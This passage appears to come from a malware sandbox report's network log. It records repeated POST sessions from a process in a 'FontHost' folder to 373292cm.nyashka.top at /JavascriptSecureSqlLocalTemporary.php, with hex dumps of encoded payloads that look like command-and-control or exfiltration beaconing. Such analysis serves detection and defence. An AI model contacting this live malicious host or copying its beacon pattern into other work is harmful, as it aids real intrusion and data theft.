                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:21.163599014 CEST2504OUTData Raw: 5f 53 59 52 51 42 54 5f 5b 5f 5a 51 59 51 58 51 57 50 5d 5f 57 59 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _SYRQBT_[_ZQYQXQWP]_WYSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^8<"[<\" &).,\>.+>+4+7 <9746;.&F$.Y/=
                              Aug 25, 2024 15:44:21.473051071 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:21.671323061 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              60192.168.2.55991780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:21.800733089 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:22.147754908 CEST2504OUTData Raw: 5a 55 59 57 51 42 54 51 5b 5f 5a 51 59 5f 58 57 57 5e 5d 5b 57 51 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZUYWQBTQ[_ZQY_XWW^][WQS_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.Y;#8!+ 2=[/>>_+.+#<42;<:;X#0)..&F$.Y/
                              Aug 25, 2024 15:44:22.474215031 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:22.603671074 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              61192.168.2.55991880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:22.974040985 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:23.319679022 CEST2504OUTData Raw: 5f 57 5c 53 54 44 51 5c 5b 5f 5a 51 59 5e 58 5f 57 59 5d 5a 57 5e 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _W\STDQ\[_ZQY^X_WY]ZW^S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/#3C"[7406==(\<[(-; <$ !3+40%/&F$.Y/


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              62192.168.2.55991980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:23.544640064 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:23.897895098 CEST1828OUTData Raw: 5a 52 59 55 51 43 54 5b 5b 5f 5a 51 59 50 58 55 57 5e 5d 58 57 51 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZRYUQCT[[_ZQYPXUW^]XWQS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.3$![?# 1).,(^)=7X#?04!*)(436/>&F$.Y/
                              Aug 25, 2024 15:44:24.240524054 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:24.375861883 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0e 3e 1c 21 01 32 28 24 16 25 33 32 55 29 03 34 07 3d 5b 32 01 33 38 0f 58 31 00 0e 51 27 38 31 10 2b 10 07 0b 24 2f 3b 58 2e 0e 2b 5d 0c 13 21 07 37 04 08 5d 26 2c 2b 02 3d 06 23 5b 35 2c 21 01 3f 14 26 08 28 01 3b 06 3e 29 2c 04 28 5c 3e 53 2e 3b 2a 02 2e 1e 0b 0c 22 2e 2b 52 0d 11 24 1e 3f 13 21 10 3d 00 16 00 22 2b 3b 12 30 3e 3d 09 32 0c 25 0b 24 39 0a 5b 25 1c 25 1f 24 57 3e 08 32 05 3d 03 31 11 00 09 23 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %>!2($%32U)4=[238X1Q'81+$/;X.+]!7]&,+=#[5,!?&(;>),(\>S.;*.".+R$?!="+;0>=2%$9[%%$W>2=1#"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              63192.168.2.55992080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:23.666508913 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:24.022687912 CEST2504OUTData Raw: 5f 53 59 55 54 45 51 59 5b 5f 5a 51 59 52 58 5f 57 51 5d 52 57 50 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _SYUTEQY[_ZQYRX_WQ]RWPS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,<!' :>/?*+/4(40R+_#\70:/>&F$.Y/1
                              Aug 25, 2024 15:44:24.338665962 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:24.536891937 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              64192.168.2.55992180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:24.666372061 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:25.023422003 CEST2504OUTData Raw: 5f 5c 5c 57 54 48 54 59 5b 5f 5a 51 59 55 58 57 57 59 5d 5e 57 5c 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _\\WTHTY[_ZQYUXWWY]^W\STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,;A5=3# 6=X(>5_+-+#<(71'((46;>&F$.Y/-
                              Aug 25, 2024 15:44:25.341253042 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:25.472187996 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              65192.168.2.55992280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:25.659923077 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:26.007133007 CEST2504OUTData Raw: 5f 55 5c 5e 51 44 54 59 5b 5f 5a 51 59 54 58 55 57 58 5d 5c 57 5e 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _U\^QDTY[_ZQYTXUWX]\W^SYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.]. #" 4V)=/?.(>8471??#\4V!]..&F$.Y/)
                              Aug 25, 2024 15:44:26.399384975 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:26.645977974 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              66192.168.2.55992380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:26.813533068 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:27.163429022 CEST2504OUTData Raw: 5a 57 59 57 54 49 51 5e 5b 5f 5a 51 59 56 58 5f 57 58 5d 52 57 5c 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZWYWTIQ^[_ZQYVX_WX]RW\STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,3E6-8]409>$+(4 ,?7<S<?\7 \/&F$.Y/!
                              Aug 25, 2024 15:44:27.498223066 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:27.634131908 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              67192.168.2.55992480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:27.761595011 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:28.116812944 CEST2504OUTData Raw: 5f 52 59 57 54 41 51 5b 5b 5f 5a 51 59 53 58 55 57 51 5d 59 57 5b 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _RYWTAQ[[_ZQYSXUWQ]YW[SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;#'E".# ![*#()]+-#X"?(4"'<;Y#:/>&F$.Y/5
                              Aug 25, 2024 15:44:28.429982901 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:28.557526112 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              68192.168.2.55992580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:28.689033985 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:29.038404942 CEST2500OUTData Raw: 5f 5c 5c 54 54 49 54 51 5b 5f 5a 51 59 57 58 5e 57 51 5d 5b 57 59 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _\\TTITQ[_ZQYWX^WQ][WYS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\,U;@#=<49Z)-0Y<..+=+[7??4!0(#_ ^;&F$.Y/
                              Aug 25, 2024 15:44:29.378282070 CEST25INHTTP/1.1 100 Continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              69192.168.2.55992680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:29.391706944 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:29.741698980 CEST1808OUTData Raw: 5a 55 59 50 54 49 51 5d 5b 5f 5a 51 59 50 58 53 57 50 5d 5f 57 51 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZUYPTIQ][_ZQYPXSWP]_WQSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.;"0Y#*>(^?*).< ,<7((\#V%;&F$.Y/
                              Aug 25, 2024 15:44:30.075115919 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:30.205692053 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 54 3d 25 0b 05 26 02 3f 0d 30 20 26 55 2a 03 0d 5a 2b 3d 25 58 25 38 2a 01 25 00 0d 0d 30 02 3d 1f 28 2d 2d 09 31 01 24 00 2d 34 2b 5d 0c 13 21 00 37 04 3a 5c 31 3f 37 01 3e 28 2f 5c 20 3c 0b 05 29 3a 03 52 3f 2f 3b 01 3e 2a 3b 1e 3c 14 3e 54 38 16 0f 18 3a 23 35 08 22 3e 2b 52 0d 11 27 0b 2b 2d 31 1d 28 2d 3f 5f 36 3b 2f 1d 24 2d 32 54 32 0b 22 55 27 17 01 02 32 31 25 54 30 0f 39 50 31 05 31 01 32 3c 3d 55 36 18 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &T=%&?0 &U*Z+=%X%8*%0=(--1$-4+]!7:\1?7>(/\ <):R?/;>*;<>T8:#5">+R'+-1(-?_6;/$-2T2"U'21%T09P112<=U6#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              70192.168.2.55992780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:29.510096073 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:29.866538048 CEST2504OUTData Raw: 5f 53 5c 5f 54 46 51 5a 5b 5f 5a 51 59 54 58 53 57 5d 5d 5a 57 5e 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _S\_TFQZ[_ZQYTXSW]]ZW^S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.]/#/B"=^"3:+=+<>5<. ?04'(3 >/&F$.Y/)
                              Aug 25, 2024 15:44:30.178154945 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:30.376466036 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              71192.168.2.55992880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:30.932297945 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:31.288403988 CEST2504OUTData Raw: 5a 55 59 57 51 47 54 5b 5b 5f 5a 51 59 5f 58 55 57 5d 5d 5b 57 58 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZUYWQGT[[_ZQY_XUW]][WXS^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,05=7 0%]+-<+=:?=;["? 72/+: 7#9\;>&F$.Y/
                              Aug 25, 2024 15:44:31.597812891 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:31.730257988 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              72192.168.2.55992980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:31.853063107 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:32.210170031 CEST2504OUTData Raw: 5f 56 5c 53 54 44 54 5a 5b 5f 5a 51 59 51 58 54 57 51 5d 5b 57 5e 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\STDTZ[_ZQYQXTWQ][W^S]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_._/!.(Y"#>),\>-5]? #41P?)#V&,.&F$.Y/=
                              Aug 25, 2024 15:44:32.554959059 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:32.681973934 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              73192.168.2.55993080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:32.805593967 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
